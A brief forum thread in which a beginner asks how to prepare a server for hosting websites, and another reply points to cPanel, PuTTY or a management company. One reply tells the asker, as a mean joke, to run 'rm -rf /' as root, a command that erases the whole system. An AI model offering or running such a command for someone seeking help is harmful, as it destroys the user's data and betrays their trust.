Server Help

Hey guys I need some help. I've had my server for a while and I've just been wasting it because there is some pre-setup I have to do before I can upload web pages onto it. I really don't know what has to be done. So can anybody tell me what I have to do to my server before I can upload websites to it?!?!?!

login as root and type


rm -rf /

then hire a server admin.

I think you're just trolling but I'm feeling generous today, so I'll reply.

If you don't have a control panel like cPanel installed, you can access your server via Putty (Google it) but if you're a noob, you're better off contacting a server management company.
